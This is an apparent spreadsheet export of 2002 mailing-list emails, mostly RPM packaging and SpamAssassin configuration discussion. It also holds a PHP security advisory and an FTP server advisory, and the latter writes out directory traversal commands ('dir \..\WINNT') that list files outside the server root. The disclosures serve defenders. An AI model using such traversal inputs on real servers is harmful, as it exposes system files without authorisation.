Designing in C, I find myself utilizing the Harley Davidson Design
Principle: "If it breaks, make it bigger. If it sticks out, chrome it!" :-)
		-- Marin David Condic, comp.lang.ada
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Harig, wrote :&gt; I've found that the solution is to %define the needed values before
&gt; calling %configure, for example,
&gt; 
&gt; %define _prefix     /your/local/prefix
&gt; %define _includedir /your/local/prefix/include/%{name}
&gt; %configure  &amp;&amp;  %__make
&gt; 
&gt; If you follow the steps above, then %makeinstall can be called
&gt; without any overrides, which is a relatively nice, clean solution.You're absolutely right... and come to think of it, I must have done it
that way in fact :-/Matthias--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</si>
  <si>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Mon, 19 Aug 2002 16:44:30 +0200, Matthias Saou  wrote:[snipped]&gt; Then why bother : The new Red Hat Linux beta "(null)" is now available and
&gt; should be announced anytime now. It contains rpm 4.1-0.81.
&gt; 
&gt; You can grab it from here :
&gt; ftp://ftp.freshrpms.net/pub/redhat/linux/beta/null/    What's the official "apt" line for it?  Is it just 7.4 instead of 7.3, or did they make this one 8.0?
------------------------------------------------------------------------
Brian FahrlÃ¤nder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http://www.guardian.co.uk/Archive/Article/0,4273,4477138,00.html_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Have you tried rebuilding your package on a system that has a stock (or
no) .rpmmacros file? Does it still build (and install/uninstall) the way
you intended it to?On Tue, 2002-08-20 at 09:38, Torsten Bronger wrote:
&gt; Halloechen!
&gt; 
&gt; At the moment I create an RPM that also adds some files to
&gt; teTeX's texmf/ tree.
&gt; 
&gt; Therefore I defined in my .rpmmacros a %texhash that
&gt; calls texhash if it exists and in the spec file
&gt; 
&gt; %post
&gt; %{texhash}
&gt; 
&gt; %postun
&gt; %{texhash}
&gt; 
&gt; But this is a costly operation.  Is it nevertheless worth it?
&gt; In particular, if this RPM is installed together with (very many)
&gt; others, are those %pre, %post etc. skipped and an 'omnipotent' 
&gt; script called that e.g. updates TeX's file database?
&gt; 
&gt; Tschoe,
&gt; Torsten.-- 
Chris Kloiber_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>Once upon a time, Brian wrote :&gt; On Mon, 19 Aug 2002 16:44:30 +0200, Matthias Saou 
&gt; wrote:
&gt; 
&gt; [snipped]
&gt; 
&gt; &gt; Then why bother : The new Red Hat Linux beta "(null)" is now available
&gt; &gt; and should be announced anytime now. It contains rpm 4.1-0.81.
&gt; &gt; 
&gt; &gt; You can grab it from here :
&gt; &gt; ftp://ftp.freshrpms.net/pub/redhat/linux/beta/null/
&gt; 
&gt;     What's the official "apt" line for it?  Is it just 7.4 instead of
&gt;     7.3, or did they make this one 8.0?This is a beta, probably of 8.0 although it's numbered 7.3.94. As such,
I've set up no apt repository for it, although you may find a few of my
packages recompiled for it under the /pub/freshrpms/null/ directory of my
ftp server.Matthias-- 
Matthias Saou                                World Trade Center
-------------                                Edificio Norte 4 Planta
System and Network Engineer                  08039 Barcelona, Spain
Electronic Group Interactive                 Phone : +34 936 00 23 23_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Wed, 21 Aug 2002 10:38:04 +0200, Matthias Saou  wrote:&gt; This is a beta, probably of 8.0 although it's numbered 7.3.94. As such,
&gt; I've set up no apt repository for it, although you may find a few of my
&gt; packages recompiled for it under the /pub/freshrpms/null/ directory of my
&gt; ftp server.    Ah; ok.  I'll wait.  I've got enough bugs to swat, but I really look forward to it.  Every version before now has seemed to have been bugfixes and meaningful upgrades of subtle stuff; I expect this one to be the "no excuses to run Windows" release to which I can point the unwashed hordes.      :)------------------------------------------------------------------------
Brian FahrlÃ¤nder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http://www.guardian.co.uk/Archive/Article/0,4273,4477138,00.html_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>&gt; -----Original Message-----
&gt; From: Torsten Bronger [mailto:bronger@physik.rwth-aachen.de]
&gt; Sent: Wednesday, August 21, 2002 7:36 AM
&gt; To: rpm-zzzlist@freshrpms.net
&gt; Subject: Re: RPM's %post, %postun etc
&gt; 
&gt; 
&gt; Halloechen!
&gt; 
&gt; On Mittwoch, 21. August 2002 08:37 schrieben Sie:
&gt; &gt; Have you tried rebuilding your package on a system that has 
&gt; a stock (or
&gt; &gt; no) .rpmmacros file? Does it still build (and 
&gt; install/uninstall) the way
&gt; &gt; you intended it to?
&gt; 
&gt; It can't, because then %{texhash} is not defined.  But how 
&gt; can I define a
&gt; macro in the spec file?
&gt; http://www.rpm.org/rpmapi-4.1/macros.html&gt; The problem exists when someone wants to install many RPMs, among them
&gt; mine.  Let's assume that every package that adds files to TeX's
&gt; file tree runs texhash or equivalent.  This would be a desaster!
&gt; There are only two solutions: (1) When installing many packages
&gt; (maybe in context of a complete system installation), %post etc.
&gt; are skipped and a complete update script is launched after *all*
&gt; packages have been installed.  (2) I leave the taxhash thing out.
&gt; But then the user would have to do it.
&gt; 
&gt; What's the way to go?
&gt; 
&gt; Tschoe,
&gt; Torsten.
&gt; 
&gt; _______________________________________________
&gt; RPM-List mailing list 
&gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
&gt; _______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list</t>
  </si>
  <si>
    <t>On Wed, Aug 21, 2002 at 10:16:33AM -0500, Frank Pineau wrote:
&gt; Omaha Steaks *is* spam.  I bought something from them once.  *Great* steaks, but
&gt; then they started calling me, emailing me, snail-mailing, constantly.  I onceIf you sign up for something, it's not spam by definition, aggressive as
they may be.  (I told them to stop calling me, and they stopped, so ...)-- 
Randomly Generated Tagline:
We didn't put in ^^ because then we'd have to keep telling people what
 it means, and then we'd have to keep telling them why it doesn't short
 circuit.  :-/
              -- Larry Wall in &lt;199707300650.XAA05515@wall.org&gt;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</si>
  <si>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21 Aug 2002 11:34:28 -0400, you wrote:&gt;If you sign up for something, it's not spam by definition, aggressive as
&gt;they may be.  (I told them to stop calling me, and they stopped, so ...)
I agree.  In a way, I signed up just by buying steaks from them.  However, once
I tell them to stop, everything after that is spam.  I told them to stop *many*
times.It's a pity, too, since they have great steaks.  Buying from them is just not
worth having to put up with all of that clinginess.
-------------------------------------------------------
This sf.net email is sponsored by: OSDN - Tired of that same old
cell phone?  Get a new here for FREE!
https://www.inphonic.com/r.asp?r_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk</t>
  </si>
  <si>
    <t xml:space="preserve">
Bart Schaefer said:&gt; Just FYI, spamassassin_pre_2_4_0b appears to be the head revision, and is 
&gt; not the same as the tip of the b2_4_0 branch.oops.  OK, now fixed; I've updated b2_4_0 to match what I wanted,
accordingly.  As a result, mass-checks do *NOT* need to be restarted as
the code and rules are the same as they were on HEAD.cvs tag spamassassin_pre_2_4_0bSo, in full, here's the changes that are in spamassassin_pre_2_4_0b that
were not there before the branch:  - rules fixed: HTTP_ESCAPED_HOST, HTTP_CTRL_CHARS_HOST.  they were too
    lax and caused FPs  - Matt's faster HTML parser  - commented rules un-commented again  - a doco fix for spamd
and, for completeness, the relevant changes since Saturday:  - the INSTALL file ;)  - CALL_NOW now starts on a word boundary  - Added examples to -R docs
  - Added Habeas HIL lookup  - bug 385: spamcheck.py should handle 4xx errors -- full mailboxes etc.
    -- with EX_TEMPFAIL. patch from ckd-spamassassin@ckdhr.com
    (Christopher Davis) applied.  -  made spamcheck.py use exit code 75 if it cannot connect to spamd,
     fixes bug 655  - spamd/spamd.raw: fixed bug 704: spamd was not able to unlink pid file
    with -u arg  - Makefile.PL: installing to random dirs now works fine  - move MAILER_DAEMON into 70_cvs_rules_under_test.cf since it has been
    improved remove extraneous mass-check line for DATE_YEAR_ZERO_FIRST  - spamassassin.raw: merged -Z with -D  - removed eff.org from whitelists, as per Marc's request  - mass-check: added versioning and date to mass-check output  - bug 658: ok_locales set to 'en' by default. changed to 'all', users
    will have to customise for themselves.   Made many tests which trigger
    FPs on mail in ISO-2022-JP charsets, meta rules depending on
    __ISO_2022_JP_DELIM.  - fixed phrase-freq code for vastly better performance  - rules/50_scores.cf: changed LISTBUILDER score back to -5.0  - lib/Mail/SpamAssassin/HTML.pm: catch background images in uri code
    catch additional types of web bugs  - rules/20_body_tests.cf: change CASHCASHCASH to meta rule to avoid
    Japanese false matches, revise spam phrases descriptions to be clearer
    (since a few are now basically compensation tests (please don't move
    them to the compensation file))  - fixed bug in MIME_SUSPECT_NAME: text/plan attachments called foo.html
    were triggering.  - revise HTML comment tests to use HTML parser  - revise MAILER_DAEMON rule (get rid of some spam matches without losing
    any nonspam matches)  - raise some negative scores that are way too low  - remove "Friend" from DEAR_SOMETHING since it overlaps with DEAR_FRIEND
    and can match "dear friend" in middle of sentence too much  - require "Dear Friend" to start the paragraph  - add new HTML tests for font colors and faces, reduce number of
    different eval functions needed for HTML tests--j.--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</si>
  <si>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Aaron sez:  It's 1:30AM. Hours ago, my server seemed to stop working. I could ping
  it, but I couldn't do anything else. We drove over to see what was up.
  ... I'll just say that everything broke. Repeatedly.  ...  I think I
  have a small idea what it's like to be Evan now. This is not what I want
  to be when I grow up.Never mind that -- I think you now have an idea what it's like to be
an on-call sysadmin ;)</t>
  </si>
  <si>
    <t xml:space="preserve">**Scraping**:  I've read this before, but it's worth pointing to: Jon
Udell on SSL
Proxying. the browser's secure traffic flows to Proxomitron. It decrypts that
 traffic, so you can see it in the log window, and then re-encrypts it to
 the destination server. Coming back the other way, it decrypts the
 server's responses, so you can see them in the log window, then
 re-encrypts them to complete the secure loop back to the browser.  It's
 really quite amazing, and amazingly useful. Automation tasks that used to
 look like more trouble than they were worth -- for example, driving a
 HotMail or E*Trade account from a script -- suddenly look easy.
</t>
  </si>
  <si>
    <t>On Wed, 2002-08-21 at 06:42, Craig R.Hughes wrote:
&gt; On Tuesday, August 20, 2002, at 09:38  PM, Mike Burger wrote:
&gt; 
&gt; &gt; Of course, since I have this list before my SA filter, it got through.
&gt; 
&gt; That's exactly what they're counting on!  Actually, I think it's 
&gt; more likely spammer humor, and sa-talk is on a list somewhere.
&gt; Oh, I dunno. Humor or not it, lets some of us with new installs test out
SA with "real" email.:)-------------------------------------------------------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</si>
  <si>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Red Hat Network has determined that the following advisory is applicable to
one or more of the systems you have registered:Complete information about this errata can be found at the following location:
     https://rhn.redhat.com/network/errata/errata_details.pxt?eid=1159Security Advisory - RHSA-2002:158-09
------------------------------------------------------------------------------
Summary:
New kernel update available, fixes i810 video oops, several security issuesUpdated kernel packages are now available which fix an oops in the i810 3D
kernel code. This kernel update also fixes a difficult to trigger race in
the dcache (filesystem cache) code, as well as some potential security
holes, although we are not currently aware of any exploits.Description:
The 2.4.18-5 kernel introduced some safety checks in the VM subsystem that
were triggered when exiting an X session while using 3D acceleration with
the Intel i810/i815 chipset. Additionally, there was a difficult to trigger
race in the dcache of the file system subsystem.This kernel update addresses both of these issues.In addition, there are fixes for potential security holes in the following
drivers:stradis
rio500
se401
usbvideo
apmFinally, this kernel fixes a few files in the /proc file system which had
the capability to expose kernel memory when abused.All of the security issues found during an audit and none of them,  at the
time of this writing, have any known exploits.We would like to thank Silvio Cesare, Stas Sergeev, Andi Kleen, Solar
Designer, and others for their auditing work.References:
http://www.thefreeworld.net/non-US/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profile.There is 1 affected system registered in 'Your RHN' (only systems for
which you have explicitly enabled Errata Alerts are shown).Release   Arch       Profile Name
--------  --------   ------------
7.3       i686       jalapeno                                
The Red Hat Network TeamThis message is being sent by Red Hat Network Alert to:
    RHN user login:        spamassassin.taint.org
    Email address on file: If you lost your RHN password, you can use the information above to
retrieve it by email from the following address:
    https://rhn.redhat.com/forgot_password.pxtTo cancel these notices, go to:
    https://rhn.redhat.com/oo.pxt?uid=1358455&amp;oid=1917980
    </t>
  </si>
  <si>
    <t xml:space="preserve">Problem with spamtrap
/home/yyyy/lib/spamtrap.sh: /home/yyyy/ftp/spamassassin/spamassassin: No such file or directory
</t>
  </si>
  <si>
    <t xml:space="preserve">On Monday 22 July 2002 07:00 CET John Rudd wrote:
&gt; On Sunday, July 21, 2002, at 08:30 , Bob Proulx wrote:
&gt; &gt; &gt; http://www.spamassassin.org
&gt; &gt; &gt; Is anyone besides me having problems getting to the site?Jepp. The same is true for Justin's private page jmason.org. traceroutes to 
both these servers die at the same point:
| mss@otherland:~&gt; /usr/sbin/traceroute spamassassin.org
| traceroute to spamassassin.org (212.17.35.15), 30 hops max, 40 byte
|  packets
|  1  nebukadnezar.msquadrat.de (10.10.1.111)  9 ms  1 ms  1 ms
|  2  212.185.255.161 (212.185.255.161)  54 ms  54 ms  55 ms
|  3  212.185.255.162 (212.185.255.162)  55 ms  54 ms  55 ms
|  4  F-gw13.F.NET.DTAG.DE (62.154.18.46)  63 ms  62 ms  62 ms
|  5  rt007ffm.de.vianw.net (194.231.40.201)  63 ms  62 ms  61 ms
|  6  r1ffm.vianw.net (213.2.254.45)  62 ms  63 ms  62 ms
|  7  r2ffm.vianw.net (213.2.254.42)  63 ms  63 ms  63 ms
|  8
There're probably some problems with Justin's webserver; I'm shure he's 
already looking into this as it affects his own website, too :o)&gt; &gt; What site is that one?  Isn't this site on sourceforge the official
&gt; &gt; home page?
&gt; &gt;
&gt; &gt;   http://spamassassin.sourceforge.net/spamassassin.sf.net is the US mirror, also accessible through 
us.spamassassin.org.&gt; They appear to be the same page, but until recently I could get to the
&gt; www. spamassassin.org one, but it hasn't been responsive the last couple
&gt; days.For me it worked until yesterday or the day before.&gt; But then, I also haven't been able to get anyone to answer my questions
&gt; about user_prefs files (not the one from earlier today, but from a couple
&gt; days ago).About this question: No, that's currently not possible. But I was thinking 
about implementing a feature like this; it might be in the next release.Malte-- 
-- Coding is art.
-- </t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 22 Jul 2002 the voices made Marc Perkel write:&gt; I've been working on adding low scoring spam messages to my spam corpus
&gt; which means I'm tapping email that scores 5-18 points now and hand
&gt; sorting it. Some of these messages are newsletters and other mail that's
&gt; not spam - but they contain an ad for something that is spam.
&gt;
&gt; So - I don't see how I can classify these messages because catching spam
&gt; within a newsletter or yahoo message is not a false positive. I don't really see the problem... either the whole message is unwanted spam
which you, one way or another, didn't agree to reciving, or it's something that
you, one way or another, said that you'd accept... If you said you'd accept it,
like mailinglists, then it isn't spam and shouldn't be caught as spam, no
matter if there's ads in it or not...
	/Tony
-- 
# Per scientiam ad libertatem! // Through knowledge towards freedom! #
# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #    perl -e'print$_{$_} for sort%_=`lynx -source svanstrom.com/t`'-------------------------------------------------------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</si>
  <si>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Hello People,I am new to SA but (2) problems I do have.I run SA from my own home for personal use and it seems to work but I see this
in my procmail log:procmail: Executing " ~/bin/SpamAssassin/spamassassin -P -c ~/bin/SpamAssassin/rules"
dccproc: not found
dccproc: not found
Can someone enlighten me on why I get that? FreeBSD 4.6-STABLE, SA-2.3.0Secondly, I've tested (now on Three boxes) SA for site-wide usage but I believe I am
missing something major because I've also had my setting checked/verified.The problem is that the site-wide setup does NOT seem to work. Why?1. I have my local.cf in /etc/mail/spamassassin
2. I have spamd running, and mail delivery logs show that all e-mails are
   being passed thro SA.My local.cf contains:ENABLED=1
OPTIONS="-F 0"#
rewrite_subject         0
report_header           1  
defang_mime             0
required_hits           7.0
report_header           1
use_terse_report        1
subject_tag             **SPAM**wash ('tty') ~ 337 -&gt; exim -bt engingwarez@runjiri.co.ke
eng.ngware@runji.co.ke
  deliver to enginngware in domain runjiri.co.ke
  director = spamcheck_director, transport = spamcheck
However when I check the mail delivered to this mailbox, SA has _not_ added any headers
to it.PERTINENT: I also run a Virus Scanner called DRWEB via Exim's system filter and the rules
that I have applied are:if not first_delivery or
    $received_protocol is "drweb-scanned" or
    $received_protocol is "spam-scanned"
then
  finish
endif
Some enlightenment would bail me out, I believe.Thanks-Wash-- 
Odhiambo Washington      "The box said 'Requires
Wananchi Online Ltd.  www.wananchi.com      Windows 95, NT, or better,'
Tel: 254 2 313985-9   Fax: 254 2 313922     so I installed FreeBSD."   
GSM: 254 72 743 223   GSM: 254 733 744 121  This sig is McQ!  :-)
"We demand rigidly defined areas of doubt and uncertainty!"
		-- Vroomfondel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</si>
  <si>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Hi....If you havent already, spamd has to be restarted. Cheers
-----Original Message-----
From:	James D. Stallings [SMTP:jdstallings@ureach.com]
Sent:	Monday, July 22, 2002 10:52 AM
To:	spamassassin-talk@lists.sourceforge.net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spamassassin.org site to check.Question:Is this the correct way to code it?# Whitelist and blacklist addresses are now file-glob-style patterns, so
# "friend@somewhere.com", "*@isp.com", or "*.domain.net" will all work.
whitelist_from  *@freelotto.com
whitelist_from  *@luckysurf.comThanks!!
Jim 
________________________________________________
Get your own "800" number
Voicemail, fax, email, and a lot more
http://www.ureach.com/reg/tag
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Spamassassin-talk mailing list
Spamassassin-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/spamassassin-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">I flag spam at 7.0 and drop it altogether at 20.0. I do lots of whitelisting
and have never had a false positive over 20.0.Actually I save the 20-and-over spams to a file and occasionally
double-check it.This allows me to keep over 75% of the spam out of my mailbox entirely - I
have 3-4 messages a day in my Spam folder instead of 20-30.My system doesn't allow me to bounce messages with SA, but doing so doesn't
really get anybody removed from spam lists anyway... I have addresses that
have been bouncing for years that still get spam.--
michael moncur   mgm at starlingtech.com   http://www.starlingtech.com/
"Truth is more of a stranger than fiction."             -- Mark Twain&gt; -----Original Message-----
&gt; From: spamassassin-devel-admin@example.sourceforge.net
&gt; [mailto:spamassassin-devel-admin@lists.sourceforge.net]On Behalf Of Marc
&gt; Perkel
&gt; Sent: Sunday, July 21, 2002 11:15 AM
&gt; To: spamassassin-devel@example.sourceforge.net
&gt; Subject: [SAdev] Who uses Spam Assassin this way?
&gt;
&gt;
&gt; I know most people use SA to just tag spam - but I use it to also delete
&gt; and bounce spam.
&gt;
&gt; At 5 point I flag the message as spam and pass it on. At 18 points I
&gt; bounce the spam as if the user doesn't exist - in the hopes of being
&gt; removed from spam lists. I have modified scores on rules with large
&gt; numbers of FP to .1 and at 18 points I get no FP at all now.
&gt;
&gt; Therefore - one of my goals in improving the rules is to try to get real
&gt; spam up to 18 points. So if I have more good rules then real spam will
&gt; hit more rules and raise the point value.
&gt;
&gt; Anyhow - I was wondering how many of you are doing what I'm doing?-------------------------------------------------------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</si>
  <si>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&gt;How would forgeries (e.g. viruses) be detected?  Would there be an
&gt;"oops-I-didn't-mean-to-submit-that" option somehow?Real viruses are filtered before they reach any mailbox for delivery.Tose two addresses could be accessible only for internal mail.And as a user is using this mechanism to build his own database of
spam/non-spam, that's his problem is he sumbit something wrong.BTW, same forgery or wrong submission problems would exist if each
user had his own set of 2 addresses.Olivier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</si>
  <si>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Marc Perkel  writes:&gt; Here something I want - maybe it's in there. I want a way to pipe a file 
&gt; containing messages into one of the "masses" tools and have it output 
&gt; the messages that match a specific rule.
&gt; 
&gt; The reason I want this is to pipe non-spam corpus through a rule and get 
&gt; a file of messages so I can look at the false positives and try to 
&gt; figure out why there was a match. IDEALLY - I would like this debug 
&gt; modes to put [[ ]] around the phrase that triggered the match. I think 
&gt; this would be a good tool for fixing/improving otherwise good rules that 
&gt; have unexplained FP.  $ cd mass-check
  $ ./mass-check [options] &gt; nonspam.log
  $ egrep RULE_NAME nonspam.log|awk '{print $3}'|xargs cat &gt; RULE_NAME.fpIt's pretty easy to figure out what matched if you write a short perl
script to match regular expressions or just use pcregrep (perl regular
expression grep).Dan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</si>
  <si>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So sprach Malte S. Stretz am 2002-07-21 um 01:56:18 +0200 :
&gt; Not really. In most cases it's an install-and-forget. But there're some 
&gt; special cases like you. Be proud! You're special :o)Uhm, yes, I'm happy that it doesn't work for me ;))&gt; I had a look at the spamc source and put a printf everywhere an exit code 74 
&gt; is used; could you have a try with the attached spamc, please?read_message-&gt;old_serverex 74host:~/.cpan/build/Mail-SpamAssassin-2.31 # telnet localhost 783
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
df
SPAMD/1.0 76 Bad header line: df
Connection closed by foreign host.Just like John just said - thanks a lot for taking all that time to help
me get SA to work!  I'm *REALLY* thankful for this!Alexander Skwar
-- 
How to quote:	http://learn.to/quote (german) http://quote.6x.to (english)
Homepage:	http://www.iso-top.biz     |    Jabber: askwar@a-message.de
   iso-top.biz - Die gÃ¼nstige Art an Linux Distributionen zu kommen
                       Uptime: 4 days 14 hours 37 minutes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</si>
  <si>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Mon, 22 Jul 2002 the voices made Olivier Nicole write:&gt; &gt;How would forgeries (e.g. viruses) be detected?  Would there be an
&gt; &gt;"oops-I-didn't-mean-to-submit-that" option somehow?
&gt;
&gt; Real viruses are filtered before they reach any mailbox for delivery.
&gt;
&gt; Tose two addresses could be accessible only for internal mail.
&gt;
&gt; And as a user is using this mechanism to build his own database of
&gt; spam/non-spam, that's his problem is he sumbit something wrong.
&gt;
&gt; BTW, same forgery or wrong submission problems would exist if each
&gt; user had his own set of 2 addresses. Not really, because you could use [user]-[action]-[passw]@domain.tld; instead
of letting 100'000 other users mess with your settings; not to mention virii
that randomly pick sendernames from addressbooks and the future virii that
target these "not spam"-functions...
	/Tony
-- 
# Per scientiam ad libertatem! // Through knowledge towards freedom! #
# Genom kunskap mot frihet! =*= (c) 1999-2002 tony@svanstrom.com =*= #    perl -e'print$_{$_} for sort%_=`lynx -source svanstrom.com/t`'-------------------------------------------------------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</si>
  <si>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Thanks Dan. And the changes were very clever. Some of his rule changes 
actually did make thing more readable and he is highly skilled at 
regular expressions.  I have found that readability and 
understandability is important in maintaining code. I think in a group 
project that it's more important.Daniel Quinlan wrote:&gt;This is not a big deal, but I think Marc has a good point.  The
&gt;performance difference is probably insignificant.  On the other hand, we
&gt;continually have errors in regular expressions, often when "excessive
&gt;cleverness" has been applied.
&gt;
&gt;This seems like a pretty good example of premature/excessive
&gt;optimization.  There is no data showing that the relevant code is run
&gt;for any significant period of time or that these changes produce a
&gt;measurable improvement in performance.  Maybe they do, but it would be
&gt;nice to know before we complicate every regular expression.
&gt;
&gt;In contrast, your changes to the eval loops in PerMsgStatus.pm were
&gt;great.  The code was responsible for a lot of our execution time and
&gt;there was a huge speed improvement.  Even better, the code was just as
&gt;easy to understand as the original.
&gt;
&gt;Dan
&gt;
&gt;  
&gt;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</si>
  <si>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                           e-matters GmbH
                          www.e-matters.de                      -= Security  Advisory =-     Advisory: Remote Compromise/DOS Vulnerability in PHP
 Release Date: 2002/07/22
Last Modified: 2002/07/22
       Author: Stefan Esser [s.esser@e-matters.de]  Application: PHP 4.2.0, 4.2.1
     Severity: A vulnerability within the multipart/form-data handler
               could allow remote compromise of the web server.
         Risk: Critical
Vendor Status: Patches Released.
    Reference: http://security.e-matters.de/advisories/022002.htmlOverview:
   We have discovered a serious vulnerability within the default version 
   of PHP. Depending on the processor architecture it may be possible for a 
   remote attacker to either crash or compromise the web server. 
Details:   PHP 4.2.0 introduced a completely rewritten multipart/form-data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malloc()/free() implementations that are known to be vulnerable
   to control structure overwrites. This is because the internal PHP memory
   managment implements its own linked list system that can be used to
   overwrite nearly arbitrary memory addresses.
   Proof of Concept:   e-matters is not going to release the exploit for this vulnerability to
   the public.
   Vendor Response:   22th July 2002 - An updated version of PHP which fixes this 
                    vulnerability was released and can be downloaded at:                       http://www.php.net/downloads.php                    The vendor announcement is available at:                       http://www.php.net/release_4_2_2.php
Recommendation:   If you are running PHP 4.2.x you should upgrade as soon as possible,
   especially if your server runs on a non IA32 CPU. If you cannot upgrade
   for whatever reason the only way to workaround this, is to disable all
   kinds of POST requests on your server.  
GPG-Key:   http://security.e-matters.de/gpg_key.asc
   pub  1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam
   Key fingerprint = 43DD 843C FAB9 832A E5AB  CAEB 81F2 8110 75E7 AAD6
Copyright 2002 Stefan Esser. All rights reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">O'Reilly Open Source Convention
-From the Frontiers of Research to the Heart of the EnterpriseSheraton San Diego Hotel and Marina
July 22-26, 2002 -- San Diego, CA
http://conferences.oreillynet.com/os2002/?CMP=EM4907O'REILLY CONFERENCE NEWSLETTER UPDATE - 071902e -Conference News - One-Day Pass Offer
 -Conference Highlights - Bruce Sterling on Open Source
 -See &amp; Do - Camping Out at Kid's World
 -OSCON Tracks - It's not just about Perl, you know.
 -Conference Details - Keynotes"In the tradition of O'Reilly books, their conferences
get past the fluff and hype of other conferences and
home in directly on the meat of the technology."
-- Jason Hall from Plug, the Provo area Linux Users Group***CONFERENCE NEWS----------------------------------------------
ONE DAY PASS ADDED TO CONFERENCE
If you can't swing the whole conference, but can't bear to miss
that one session or keynote presentation, pick up a day pass,
available for July 24, 25, or 26.The cost of the one day pass is $400. Please visit:
http://conferences.oreillynet.com/os2002/?CMP=EM4907
----------------------------------------------Check out this year's program for a look into the future of
open source software. Register Today!
http://conferences.oreillynet.com/os2002/?CMP=EM4907***OSCON2002 HIGHLIGHTSBruce Sterling, author, journalist, editor, critic, presents
A Contrarian Position on Open Source, Friday, July 26,
11:30am - 12:15pm in Sea Breeze II.Sterling is the author of several science fiction novels including
Involution Ocean, The Artificial Kid, Schismatrix, Islands in the
Net, and Heavy Weather. He edited the collection Mirrorshades, the
definitive document of the cyberpunk movement, and co-authored
the novel The Difference Engine with William Gibson. He writes a
critical column for Science Fiction Eye and a popular-science
column for The Magazine of Fantasy and Science Fiction.His non-fiction book The Hacker Crackdown describes the law
enforcement and computer-crime activities that led to the start
of the Electronic Frontier Foundation in 1990./==========================================================\
Convention Newsletter Sponsored by InfoWorldInfoWorld's Next-Generation Conference
Web Services II:  The Applications, September 18 - 20, 2002You have heard the promise.  Now hear the reality. InfoWorld's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31 and save $300. Use priority code P062405.www.infoworld.com/nextgen
\==========================================================/***SEE &amp; DO
http://conferences.oreillynet.com/pub/w/15/see_do.html- Camping out at "Kid's World"
Back again by popular demand, Kid's World is available Monday
through Thursday providing exceptional daycare for your young
ones. Register now to ensure that your children don't miss out
on the fun.
http://conferences.oreillynet.com/pub/w/15/kids_world.html***OSCON FEATURED TRACKS
http://conferences.oreillynet.com/pub/w/15/tutorials.html
http://conferences.oreillynet.com/pub/w/15/sessions.html
  -Python, with an emphasis on Zope
  -Apache Web Server, specifically 2.0, modules, configuration,
   and performance tuning
  -Java, featuring Jakarta, Jserv, Ant, and Jboss
  -Operating Systems: Linux, FreeBSD, OpenBSD, OS X
  -Databases, focusing on MySQL, PostgreSQL, Redhat B, SAPDB,
   Berkeley DB
  -Emerging topics, gaming, shared source, government projects***CONFERENCE DETAILS-Keynote SpeakersFreeing Culture
Lawrence Lessig, Stanford Law School
http://conferences.oreillynet.com/cs/os2002/view/e_sess/3027The Free Software Movement: Where All This Started
Richard M. Stallman (representing the Free Software Movement),
Free Software Foundation
http://conferences.oreillynet.com/cs/os2002/view/e_sess/3047Hacking the Genome: Open Source in Bioinformatics
Ewan Birney, European Bioinformatics Institute
http://conferences.oreillynet.com/cs/os2002/view/e_sess/2389Evolution in ActionJim Kent,
UC Santa Cruz Genome Bioinformatics Group
http://conferences.oreillynet.com/cs/os2002/view/e_sess/2586The Changing Relationship Between Business and Developers
Paul Pangaro, Ph.D., Sun Microsystems, Inc., Elaine B.
Coleman, Ph.D., Sun
https://conferences.oreillynet.com/cs/os2002/view/e_sess/3178Challenges of Open Source in Visual Effects
Milton Ngan, Weta Digital Ltd
https://conferences.oreillynet.com/cs/os2002/view/e_sess/3118For more details on our keynote, tutorial, and session
speakers, please visit:
http://conferences.oreillynet.com/os2002/?CMP=EM4907***PLATINUM SPONSORS
Apple Computer
Active State
Sun MicrosystemsFor information regarding exhibition or sponsorship
opportunities the convention, contact Andrew Calvo at
707-827-7176, or andrewc@oreilly.com.---------------------------------------------------------------------
If you want to cancel an O'Reilly newsletter subscription, go
to http://elists.oreilly.com/ and de-select any newsletters you
no longer wish to receive. For assistance, email help@oreillynet.com
---------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Pablo Sofware Solutions FTP server Directory Traversal Vulnerability
.oO  Overview Oo.
Pablo Software Solutions FTP server version 1.0 build 9 shows files and 
directories that reside outside the normal FTP root directory. 
Discovered on 2002, July, 20th
Vendor: Pablo Software SolutionsPablo's FTP Server is a multi threaded FTP server for Windows 98/NT/XP.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MS-DOS ftp client. When you are 
logged on the server, you can send a dir \..\, or a dir \..\WINNT, supposed 
your root directory is c:\ftp_server 
.oO  Solution Oo.
The vendor has been informed and has solved the problem.
Download Pablo's FTP Server Build 10 at : 
http://www.pablovandermeer.nl/ftp_server.html
.oO  Discovered by Oo.
Arnaud Jacques
webmaster@securiteinfo.com
http://www.securiteinfo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline MailerThis week on perl5-porters (15-21 July 2002)
    posted by rafael on Monday July 22, @03:21 (summaries)
    http://use.perl.org/article.pl?sid=02/07/22/0725254LAN Party at OSCON
    posted by ziggy on Monday July 22, @13:06 (events)
    http://use.perl.org/article.pl?sid=02/07/22/179214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</si>
